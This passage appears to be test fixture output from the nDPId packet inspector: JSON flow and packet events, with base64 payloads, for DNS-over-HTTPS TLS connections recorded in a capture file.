FIXxOJTiZrwtOg0PRbjHk1oNiocDmQfIuK+9XQjJXpmH6WXi1GuKS6BI\/Mhq7VeFosQzd4f6PedlOLyqUiLqOkZBu8shjDKqJBgT+asclbYKMS0So4WatuM12p1csrxpvTCnaj0btgSWvRlOtA5V89mkHs0RlWfRzITmJodp36A7TpRfkiq+5ADaJkK4PCqzM7n58+S7faojcjUVNv3TZMKR9X7THNbnF4RYlkXi+yQzERvi6AVU4qjl1T3oshQYm+0uXk6wZy\/EHFkS0kI4JdkMrhx\/QDyFE9JrZnCDaKSbgnVDXGxQ6JI3KX68rAnXlo16wEjgmYiB\/CpDOACPBUUmkRPrMxrIYGRVY5m4VHDtxxsBR+4pWd57JVtTXFf0dDyH1zJz6Z40Wrwh\/p6Qz5d2q3mQqk2qU0E2kn8++EZD8541s2A3AenqtWVuRk32zNIyJfY0yQnjyuK0juMCVOEjM4+TSdiFJcZE3rzM52S9F4fUWq+Qa6izwHy+3rJUcjKQaK3KU1ecorGHjAhe9fanpg8OhUEfZK30POLsPc9a0KJ8Bhzb\/xTp4iMokguZqwGUeiTSNyWJBScTyI9LLhhKpNOWbmn0FCwxaV5Mbt+mvTDDVs8cw9GaOZN49PQe6J7UFtKhXp+jLkt\/igfMPvVErRgHNbDWAx05yKKN5cVgAGz+obL+4ZX79sXQRNBQfrfR7W7COyUVVMPxrdFItZFJXlJ2qtiFtfv22UGoflFY2zoiK9sk9Zj+K1u+9Vmzjs+RITpDecu73geffdixXjb3urBW4FykkW7oiu0nkWHDQgL+KviHt9Tm0lU0Hzsi8YTo4OdVu\/QwCcmn\/9YMQoYmxguinCV0SqsmSoXYPpWKAlUH8vnANpkvHS7OU72AWRuphcFRa4RXp48xd9rXEW7d6pcKpL7UD\/qAcfrqs3Aq3OBcZjm\/9+CZ\/HA+ws2AIqrw+2oY4SiSGn\/cjxInZ1S7KChZFleUsKWilMt0S80n1UHIe0ozJo1YpV6O+256ILtDlEXLc4L\/\/W\/Y\/61lq\/\/f9IHao9y20WHTGbxQOKX1rXuMjgZIEMZvVKqcKW+vUa6jVq0bpPfVryu2fyy6bH4O8lkPOuhDeO5FxfnatEMjgu7F6t\/PeACLHie\/Eg2ezTBDOdT85sb1vFD3nB3c3wl9xSQGoUXMREa3dlU4yyKTsRvhF5IVHX+WZrnZEXNIyBa2yqUn\/9nlC+Nlg+hPHBSdvrZNSMA+riMftxpQlj6FTL7EYx8bKMIfPYnyZddeZmxpXN9XqWLs7KrnqynK9ZMJhVvaIAMfyuBU2fqyPpflnNhs96RaJ+FGM\/iw\/mZYOsIhH2JBIZKVlvkBCQxCbysphauFVIsTMYeZEcsoCjFB1qKXHuCceZxP4Jy7kiXMgSTdDFzzGYgYfCng1fFfHI7zfjdtWkPQ9HPe5f9egBljz+JDS6ehJP7PfY20bsjB73IKGpwaFJB2W5txeWuX9YJMSmwLmC9CvECSoWQlENl+g"}
01084{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":408,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739389936,"flow_last_seen":946739390265,"flow_idle_time":7560000,"flow_min_l4_payload_len":281,"flow_max_l4_payload_len":1410,"flow_tot_l4_payload_len":1691,"flow_avg_l4_payload_len":845,"midstream":1,"thread_ts_msec":946739390265,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"45.76.113.31","src_port":52028,"dst_port":8443,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"doh.seby.io","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"f4febc55ea12b31ae17cfb7e614afda8","unsafe_cipher":0,"cipher":"TLS_AES_128_GCM_SHA256","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
02363{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":409,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":3,"flow_last_seen":946739390265,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":1464,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1464,"pkt_l4_len":1430,"thread_ts_msec":946739390265,"pkt":"ZmZmZmZmRERERERECABFAAWq7z5AAC8G9+ctTHEfCgAAASD7yzz9Ej0SWq\/nalAQAfnqiwAAu9LAVBlO+s0L+nkwU4YXcw1SOmlRl+XSnXuO6tKFQ694AGFrib2S2f3BX7B1582XtNQQL\/1IwqS9eCXYJzjdfbbKDKnkw+MRH36zeNfFmebdTa26VGWOgnZNECwEpmFBvEXSt2RPI6ofb1vE32eZrFh79Bpuwp1PCG2ngGNn3Z\/o1aRMv577hTiLGHUP3zlCYCAacHiSAEi\/LQgxJOLyR9jugiMcNQxMzI9B1anoxyifvPkh2BJiEbyAypQ1hQGudgFCLTi2Txkt7Eu\/NIUQoPpDLsdh3lHWxNLyLEP9wpzBgp6l3ilL84X1Mk7ZHQuPK\/Oz4yfrJd+G7Oo6i1yrQ\/Adp3qU8KnQ9ptwaIVLOtg8g5ENilAbdYS7Ka3cZHFz4gvVtmLddRHiTcXVf5C1ypTeGluZMusSnmJOjPWY5fp5RP99ayjRwQRdkg+IcNHiO31ps8qxZvYyOJZ7Fb87gLgZwV0IUvyDuDbizEwr2XSGbMEZuVoSHx9QyUP+A3BPmqRGGD9RWvZIaULosdFkVeC1hEiNEcM30Eo27GhCBEkpzGPbQ95LfK337HDa9UlKAktQhKwG8\/hAtMIbbv5Noetnx3T81i7FzhkyHH\/C6g3BkR97pP7xxNGSesRAej+0SV1z2Ux2yezANH89JV1k9OQdFbMalrjLnx8kanK4YG3Zfke83pATlf6RAPV3lPyNNDQQypoZkugKEUxOXS7Rx2XEo0segrTQp7Q+35xLorFirg\/3rbokzMw54\/alVY08gHsLJlNmadq9IZ0Hjxo7ykUIQsSRH59BS476g7Zzq0D6LzWm8dRwgOJiFmUme9r5za2XErhkjyFFtknvfbQcxGFpshYQjf44nBtFebBI6Th81Pz6P4vS1Ab5Ldbe5kqW2W6OFyHBCtpJQLdqxOC1y4j8o1zpDr\/5I6fMit0JvTc1WNaN6qBFlg1P6Gaatd4VK3xOWgpdV7lGy9Cs1aJIggG2JQikJ7xxWvncFI3YNX\/j7e31omXzttI+wKWBnq3libBpSCKXTzvdWZpJ16RDkXLbmBFLlruWHpbIZvg3vh187AjFKcBshFCVg\/9CKx0tdclgUGbHqJ7E6OtJIm4m4kox5tzQjCDUJNS29SjoWoK9anOoaXw7azu80JwAvB5wDC4mKG4pcolzPcWCdGzgc4j\/1wLg0a7\/6J83Mv9Vwe7sgJa0WfVmJh67OWIpAbZv84XgLPcLVo5yXd6\/yWWRMvn+kXy6mm6tMTinzOpwIpfSCVQtp3DNLsEUsIkV1DrWVNbTPvH5GCVkQ8p3Lo5BGZ2lF4qqWWh0bwR33Xc69aAXaHUgKcezVe1FfG3x1Q3qp0cn65Dxae+n\/hfZa1KqbpdsxY\/eLTfFV7m+HIJAbLFSSzH7PU\/MSQj8rvEXnuHMSR3htHNgcZRMLZGZNMcEgX88HYGJMITbgLbQ1nfRTwzL8m8XTnhZtErha6pHrFlPsZ1RNjcoqZKgLKdMg2ezfrI8Jq0lQFzAOf3F4VPbIGq1krTP43rpCLbzYETrqQH8Xz467NmG5PHVJ3Hne12KAqQma4zC6YHwFBTwWUunyHc7Z86uw6NV1GMEfe39uxIB1Th3Q3mEC1zo37vRQUYEr8R3n9WX5ZtJpDmxGTtrG8c0JVrUZpjFnqPj2Uj069ivRfFVD19zTIWIWwVZHNTkf54z1SZJ+bsWwla3CC3KyaPHGsTreYdevDYggE2Ww91a5tn8NCHUwyaWPcCmBikp3+fKDZwg0dx3gKVzU8Hf9Km4EdsDin7gSeY7n3yByLcyqnB3hOSBc1nuPCEOi+hB9GXpEuBRdmMhQLcAelRdGq2lZwOE87jAboVg7rc+WH1wOyzCb4UJFuzyaFs37Li8enr+"}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":425,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739390933,"flow_last_seen":946739390933,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739390933,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"217.169.20.23","src_port":34036,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00844{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":1,"flow_last_seen":946739390933,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":337,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":337,"pkt_l4_len":303,"thread_ts_msec":946739390933,"pkt":"REREREREZmZmZmZmCABFAAFDddBAAH4G12cKAAAB2akUF4T0AbuSPuOKlASrClAYAfavsgAAFgMBARYBAAESAwMYXSzw+8AvMstO05PQ7qPBj27f4mGkG8QM9OU7ZRFcuCDJZDN\/6VucUquGKl+O4ES6VCX4Z6V\/a7wGR73kRIiX4wAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACjAAAAEgAQAAANZG5zLmFhLm5ldC51awAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACAuLsKlIgLTs2y17K315yEyJxqnsCXfl0yS1kyaNKG0aQ=="}
00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":425,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739390933,"flow_last_seen":946739390933,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":283,"flow_tot_l4_payload_len":283,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":946739390933,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"217.169.20.23","src_port":34036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"dns.aa.net.uk","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
04675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":946739390967,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":3165,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":3165,"pkt_l4_len":3131,"thread_ts_msec":946739390967,"pkt":"ZmZmZmZmRERERERECABFAAxPNc5AADgGUl7ZqRQXCgAAAQG7hPSUBKsKkj7kpVAYAfW6vgAAFgMDAHoCAAB2AwNggvgT348vLVfztyje+nh951Uui2O3z\/vCGwcNEmcL7CDJZDN\/6VucUquGKl+O4ES6VCX4Z6V\/a7wGR73kRIiX4xMCAAAuACsAAgMEADMAJAAdACCYu4Q1ZjtZfYUrS3fwrroPQafz4tTgHn9jgiQX2w0NexQDAwABARcDAwAgr2vUeHfWinGo7k2fDAirV2y2+2vt58RojQUfF3ywprIXAwMKEF7v66Q95J7Madk2ZEcExfHDptRh16jabZXVGAjSu6ZVpQdW9tsq8WD0VxRfdaushrVbrrTRIk5I0CixRifCcooy6c56kGsUxb8wL+Z+QNmR5uWAeV9nzzlGQpBhNwq90IzHQbBwHdfR22cB\/o+gnP0zKhtFT5pdVatUFFMBXYFPBfgmW+yElY9JLYGDSC\/IIw728fBQlRPlTOPnC6Bd8HZeDEbFd7L\/8oeIRd34AfymHYlFpxJ8CjS4xP7I5o8GpeBcv96KPHtYZV5dsMuE75XBxooOpL9Gr9IWBy6AEdPGcU29oVVhWirzJ93HxYSeGAAYTfsu16+HrpOMUAzFMOyXwLKfIjR9Jx84Zvi3ytxvu8IPsZAmQB9iLco+v\/PYNz44XswLq2rQZtIH4a7\/SiljnI7OvMEtw+9+0ohSjEBjqZNpZ4+Di4Oi4uvLSj90PiJtsiIz50r+luuFIJLrHS\/Bx2ooWNGmf8wIpBNOEoC8uYmbQEc0M0F6MgPM2\/Dc1rxiGmLW966znBcYtqEPAIF5LP4HjDzAMEtUySTvYC8cLBRrZgX4sNAbkCcpNw4QFS6erQa8jKBVOZjyMqQVsAikZDL76qZyWnWAbrLmD+ESPhH+LiOjwj\/BVLLmuPIqP2HgrWrkMLok\/KHXuIbZn7C1n58rcMZq7V+5f3gEi6kXuPOTozMsLixf3wStDsNPpLZW5vF+Opg\/HPuTYMBM+b2VDW0oQ+mGR3v0lSfTyZb2sccxT0\/YFa2\/gZNRs9igar59HBmzwzWtwto1Lj2+tqjOzo9Vxzmqr0QO+5jA9knewsPjci1iEHsBRvkAHDUo8mzkBfWBM8t9UZZElcDeWIg7oO2uY349FEzTQzJrCGLOJ20pc10E+6FXsRSoQcdecc2pqUoNYisiO4BgvfGVRTx3PyLsE2LqpgS5+upDBiBuHq9GTnvPUwfjHUOVZfhEY9kzfkMm52CF0hrFbS1FqZu2k5xWd1RZ+YdcxocleEJLDXEEeCaF2XJug2p3sgxI8AQfg96H0lHo6\/ce7YWyFTSQ5214Zlm5R8arc+k+FFIGpKsd1JRZDuMs6lUG2OcuW4k6GmXOA9lL00+Pu1LlWECRAA38IcMLlvDeoyIVPF5RKHTFbtFfFeynrkfS57BDgpnUQsOLofW+MsR51VSL7z5rFWkT+0yA0OJ4P5J1dZjOVbRrnPj+lP8KBidjvuv\/+vQR9AYL2FUFonbuHYQ6NUOJSyw\/q3koSUCoI9nF1rL5SbnJpgQ9XzQ2ozstAI1DR6AAJPio22EFuEDMEoFVvE\/liE+8UHQnOZNeIN8tMqUAL+WlkvDEcrehWMNUpY287pebSO3eZPDe3egHiaBMZQIlL4jO1lfEjJdr5RXvT9Uv4MVNGGGXCQtr4IWIfMjPSJmmedmBdcxMuZnxTJ7jKLERRom+1LtykcTtbFMZ6nwh7KNIt58CGrTH3Bh+ClGWC6JtjiLbGXtcN8TOs97BoUvfH2xS4muIblEv23sWDZt8uHBdYWb8qBII2zRRCNz4TWmEJd5WuNBsZajJ6+izq\/kuJOWcsJ\/3ClD+JPyh\/faP5RIOC8TtW52DI8iUXjhh0HYoQNP5CK\/yGELUKYphGmQcP1BV0e5C\/xs86j3J4Tqg0y4WesV3d0jU+gkOa\/xZNpDrlV+JnewVAhCkK2UsUk3C84VdKoqUnp9Pil5XcszuqrrK5fn2Ja3xJCvI9oUZYFRkj+cpcHiFBzHL8vrxujIbPqQsQDehofVoxDKQvUog5ZiOw9rqXCH+rf4pa2omETeM1OE52\/bijRwWFKerGk95vgv7mf\/pTz2jvStIe9mIenHJWL7PEZH9sdGDeZQKhralY5AEfcr8PAGFV0XOY4OvHkHHS\/kY45xH7Heg3RGSUSAkY6LhaxYZOH3vCb8pDwz4M8eJ0\/MawhboSpIfQdoDBfBZibpy+ix0cl6f9YHPnTxwCWpi11t8Y\/Ioe5G719Te12HR1+3LJDUG4+t8UMioCT3GNag7c5mMGY+V+40MlPf33OO2SuBDaNUe80cz9ZjBk5x+9\/8yZnlpBgJheqdBeGVTSfNj\/\/ykzVs+ovI3rQWJ7MtuR80iZzcYqQWbI4RBftGKVwyCcJOskMGArD6+UArYfVGIccM6l6ZaD9x6dkigf3LAHA30iuQXdDyjNpxgxl4iSK0oLixFkkGZE94ONcw\/GLLOMYGf3ZsNLQSPf2qyfAF5BKKKg7FAQid7pqgyCZp5F8XKbACdlEb9Lar38xOjvjnewcnGzD4Z6c9THtqSZcDPbz8aL6DmV9lXZmD6\/ccDsDkRU90nhHSMrUF5R8hxDMoP6Be02AohXJwQbll1wPcUEyYk+tfY7XoP1gsqXecmTp+tusAg1\/AwZK8oozX5LgL2HyoOuByw1lgzh0RLilH5JrY3yk0E\/jG5JRoV\/y41cG7xAhvYbSNXDFCXbKeSVI5tgPheZvJ9ZUyIfStt125MRChKnoA2n+mG9KzbpZpyVz66ndTD0j3XU1kDOqjF1\/SbGf1+fhwWGaMMcZUYzUS1y0NN++mGlj87\/Z\/u1peJJRpJLZAkwhE6\/qyvUgAeD6bdzGa3m+9PvZxqRFg4uO5BEHphZPz4E5S9y+qwaFy+ng2E0E\/+Mq99pz8NTeooSlgjy86miBLzf74wOBFSoHbVN0PHL56xSrx12FRC1SCfzqnzT4BREj4eRgr5sVcZJpcqB\/DJ16zqD31Cdz1F6VAt5mHD5hgyW+BhQO6jtpBgHqFisMVPWD18uXILfOEcLKzexTq0enEqkxPPztMgd3lKJoJoLn9D15r82RK7HhKsmZiDKUuCdmH3DjKAbtkj9uSMWDKDEZ7ALu1TTrcVpMz\/u916YJjVrsJ4zke1Y\/PKCwgQji1xX0Q1uKg+Qhmzj0YA6C\/ZB8hBOasuUjTVZER2lXZpSogcQcgdsx7P47du+ZkiOIevUp1ckurR953sVaD3ci+d3blInJn3V2H1nd41bCStQkPyhbrCiGVWDvB4NjqVSIh6ypL1X2Tez7o9uIFek3e\/KdLnjoJYgUoUCdBCeRBScD+0K+sqvZzi8z7OnTzhYK\/aCGv11HpK88nhB\/fu4rCw6Clf8iUvZmwOIdmA\/mXVezV7u9+Y+L4mJOPGGV+Ie7YQjoii0W0J9zldsek4JrCNAfpxxvmfZTghYCrVQJNlGcKyp+LE4s0nXJXsv8iOBmDMV\/qiHS\/RfVp0Al+GVjFpErgTgXH8uFG0eZxhSX5TnPtc5X3FjIRORKWkOyTX+MlnBU+yWrj3iWALBhonn7tNa85eK0vFJHHFGyQm3hMEk7psuYZdoK61bs1KKeUi4RTDX274TTDnDx\/vYrXCGEMbInwJeEUUq10Y0AUNC+ikXVAlZm5\/6b3SLH1mmyzy5AwgfbHNdBdm2h13eHYAHANjDp++p3nOFwMDARmCniHbpabBh0wmz+4GvD7gEaHTo1WwpHFuO0rRndT2cE+rB3NSEIZ\/OfAhdTV9eadRkxEucZ2zRFouLobhVj7VuatuyZROJYubLXxY0L2AD9VfNIXMUeRNHnXvmwyBiqm\/8ZuzuiYxPVzYGJuS41vYyyQm1ND0\/vWricRWNYCIXjgbSqk6PFYh1FVGYRV8SSt7kE3Z3NtrXGW3LuaKD8ymXSg9dYJ9GwRxcPV5is5NEijit\/K0HuZymRnz0biX0ibyZ3bQdAu+3E+KHkL1KMxQnoIP\/X4lavINi95Z\/1+WkK1enaEAwf7tuLJlq5tLt+JOe3OVPJYXu+hVDAzfIFEvugfqxQ4aetpIOYSy0uy\/8Blk6BuP7s0kZRcDAwBF06XPl0W4alPWKLcZUBV1\/sR9gwxnLLJ0WJlMdAUkQ1CCMVwzdsK8lkkZUPttQ7nY8WKaipYb2yNRvSYmxfuU2S\/nIBiL"}
00947{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":426,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":946739390933,"flow_last_seen":946739390967,"flow_idle_time":7560000,"flow_min_l4_payload_len":283,"flow_max_l4_payload_len":3111,"flow_tot_l4_payload_len":3394,"flow_avg_l4_payload_len":1697,"midstream":1,"thread_ts_msec":946739390967,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"217.169.20.23","src_port":34036,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.3","client_requested_server_name":"dns.aa.net.uk","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
00570{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":427,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":26,"flow_packet_id":3,"flow_last_seen":946739390970,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":134,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":134,"pkt_l4_len":100,"thread_ts_msec":946739390970,"pkt":"REREREREZmZmZmZmCABFAAB4ddJAAH4G2DAKAAAB2akUF4T0AbuSPuSllAS3MVAYAfWu5wAAFAMDAAEBFwMDAEWr1XNIOucPlOXvVPAlxCVPjuVei0Kv510pke\/KbmmoYPXHQYgn\/dXPL9SYgvzqDxY7NHWdbkgaLyLveAQw2UhT5DxScM0="}
00587{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":439,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400294,"flow_last_seen":946739400294,"flow_idle_time":7560000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"thread_ts_msec":946739400294,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"146.255.56.98","src_port":43718,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
00854{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":439,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":1,"flow_last_seen":946739400294,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":346,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":346,"pkt_l4_len":312,"thread_ts_msec":946739400294,"pkt":"REREREREZmZmZmZmCABFAAFMOfJAAH4GNZwKAAABkv84YqrGAbtdpqacr2JwdlAYAfaNXAAAFgMBAR8BAAEbAwPHJz7Bz9zA6vh2mAtXguxbTFdhb5D1tFb1Dou8iu1ITyDK94fArz+mQ8rbbzgPn8nq5li5Q+JT9k4ZyOL9YBHZZQAmwC\/AMMArwCzMqMypwBPACcAUwAoAnACdAC8ANcASAAoTARMDEwIBAACsAAAAGwAZAAAWZG9oLmFwcGxpZWRwcml2YWN5Lm5ldAAFAAUBAAAAAAAKAAoACAAdABcAGAAZAAsAAgEAAA0AGgAYCAQEAwgHCAUIBgQBBQEGAQUDBgMCAQID\/wEAAQAAEAAOAAwCaDIIaHR0cC8xLjEAEgAAACsACQgDBAMDAwIDAQAzACYAJAAdACADmPqzqEwwIPykBECgQ7iBmKhoGpqhv77PEzGKWzxqPw=="}
00914{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":439,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739400294,"flow_last_seen":946739400294,"flow_idle_time":7560000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":1,"thread_ts_msec":946739400294,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"146.255.56.98","src_port":43718,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.DoH_DoT","breed":"Fun","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"doh.appliedprivacy.net","ja3":"d0ee3237a14bbd89ca4d2b5356ab20ba","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}}
04392{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":440,"source":"dnscrypt-v2-doh.pcap","alias":"nDPId-test","flow_id":27,"flow_packet_id":2,"flow_last_seen":946739400340,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":2958,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":2958,"pkt_l4_len":2924,"thread_ts_msec":946739400340,"pkt":"ZmZmZmZmRERERERECABFAAuAAABAADgGq1qS\/zhiCgAAAQG7qsavYnB2XaanwFAQBBOXkAAAFgMDAHoCAAB2AwMDsBehTQYQ\/iH2Yhpyf+mLl1C35r3Ho6TovknKnjr8riDK94fArz+mQ8rbbzgPn8nq5li5Q+JT9k4ZyOL9YBHZZRMCAAAuACsAAgMEADMAJAAdACBo4BH+AA5SyDExxRIaGpKShy1vmsbixTg2m2T2NedPDxQDAwABARcDAwAgvk7ezJo1JZP9LjmZFBvdhSYoK5Td7g7\/A2oIAgI6osUXAwMJ2yS0n6M3Ydri+rIgYVXd+jwuTvP8FF1HMS4hAE9YkVd0802YEbU3pHhUuQANn0vXApBPxbj3FV9uCCuIZCOL4zY7+k\/N9QNOxO6wgqwyjpqF\/MSuGzGbkODdKsjr3MXDrOEDT8UY4Cf7sbDSqOIkajzwlllabjLyw\/JVxOtUepEpKMKQWPduyvGLlnSE+4Pi9X1F5dljLFonfMSt9epl2VwSF1nq8Zl4KKstqyQuG\/zmvd2vjAUtpZ7bRJhqcQEAuZwHSvB\/MtIxXfAzVeG47SjsazBlsuRoBS3fTomilsUH4J13\/0ChaLizKxEdSZ2w2K00iVdJ7hQkti8Yk+XaV61AEfwts012l3Az0Ul6QGn+ovAsikUEMTOdEJmAEExk\/NRuYh4YJeat0fT6qqxPxOtp8iJmxclZOIdEdtKfFRlb\/Q3pIWRMmx+BKdsNQm6TtOsUrqgzJEovgnDvaBUadejY9LBbNHqxMK2V6F7gbnGKVjBjB76l32rCkAGXZjYpu99n3pc8VsX6toeCgNv6uuTb2IhBkEMBsiXbrPavcq8F51o9cjY6ri1T23vFWkuEBAAWOdINJTApJO1joFFgFxyMMNnlCpJoVnqu0i\/rinlDFg7S9CtMSJ0Ubb2fcMiTZVA8sg8c2grczf38tyMaZ9tLwrWkyrDaM66WF+r\/Smzgjb3lUh8vJ3yJCEPyKRtiP8bLVA86MJJR6swDhhbPo5TZc3HPN3paBxU5U9DTyACxQnk6EYqYsA8ZokkmQV3rXvd3nlNnXQvP8iTrcL1LydrbGPEmcxzftt97lwfP6IxI3O3sNlij9LY+i3W9W6NVdJf0gVlPHB34DPsUDzGCBqeTZuUD+fgbA8m0vHZeGLaeh2n\/ATJxgu83kBANWSs0j4JxeZwkxA4LQE6k9KdadeiuFQWUUsCMoytEmeRS+e2CKC26bva8V4F4G5ILpiDrVUa9OPpnIugEC\/pCpbfo45ejO0OYsjmcSB9VHs67ODTG8tfG\/HSnEWghmAKv96DqsZyAaTmkT0JkH5FkXlCzBQ8v8o8b6rSE0lRW\/lesYflMu+sWf50UV63CFJyy6fgpaJPxCw8SCnSJ9Wfe5036kFXS9TxM7sPwyghnAoVeaf7Fck3c5pxthPEaz67tzSOMeekQJOQi7xMcEt3jcaR5XiiPfvpfvbXLOiTYOMcz4nBR25XpUeWEHByMxgi+V+13jYe4gb5oIp\/OYL+ldNmokkEz0NkrXv9PYcDVxLHdE8YvZjA+Y3MOkWFCk9BM\/Rn01CyqbL8CmN\/DvCsMgWqz9BmPnWHQOqMnYSTykXgSFe9FyeKoNSng2DkGXmS4Ish3yys0i\/QIlGlT9piLrC2UOh5tHQYhdkxZTzWOLoSNhJgdpKplLIWgmFyDHNvrhDmwq50tATdlnRMhe0ry66PsM3l0lek7HZ1iPpCZ7a660QlaPE9SZFbRD2hjaqHqZrlPWWwgi6eHfY0gu5vY3pzyuUgNc+IY+oeDLEyaB3ysUDN7Sr1IZYyAtSiOnN0WLtHIeg9uqvR4NEBF0XEfeRxZT0n6RrygJ1nWV+kailDfsz4vklZfPYltDFOyTnwOyyzBO2WpBi+QHoJdR5a+ci207f4TAHC5iWzq9Ov\/CBA21s0iwXcKHtUUuFkXfGsSTcHlMRdWRoqqdrwRmUkHc5FaU6RNse5tyVEdBKfOwfXkDw8I22zIDBmTO4YVBH4Dzw0SEVpSPVqE8m2STbZxIzmRtVGFxbw45tbGu6NUyHfb6XRJMV4vKdl8h+lVfwIggGdSBSYb\/J2WkIjXI5Z1\/s5OXr498b\/Ul1cfjj192V+QV7YEDHDJ0wunGAConliOcHcZIZrOpVaNMM7NeTBxiiUgynpVWjltr\/LQuk0Pld3mEIxmwXht0KmUnXyCvTBJgPYroLRuneYRQPZ1JOgkt\/kdsQBmYrZvkRHKWFwNxkLAhypRqmOoE6eO9TYZgchFtH7ouVK4C6vE0wlk\/wNdktEQVjtjEf81TNo\/lytMdDE\/EAGs9weyRqd\/Hmz5\/6yLIgAilI7sqB7dEuE0iiOXk4T95pQbOjvSnwI7M4B7Q3oDNdWJJRZNp2tZGQNCVfj0OFzEKSZbanefGx8qbWewy7Iup5wriwLbBG\/B7ZFkxdmUnEdpL4pTOBRMxGDxRjV5i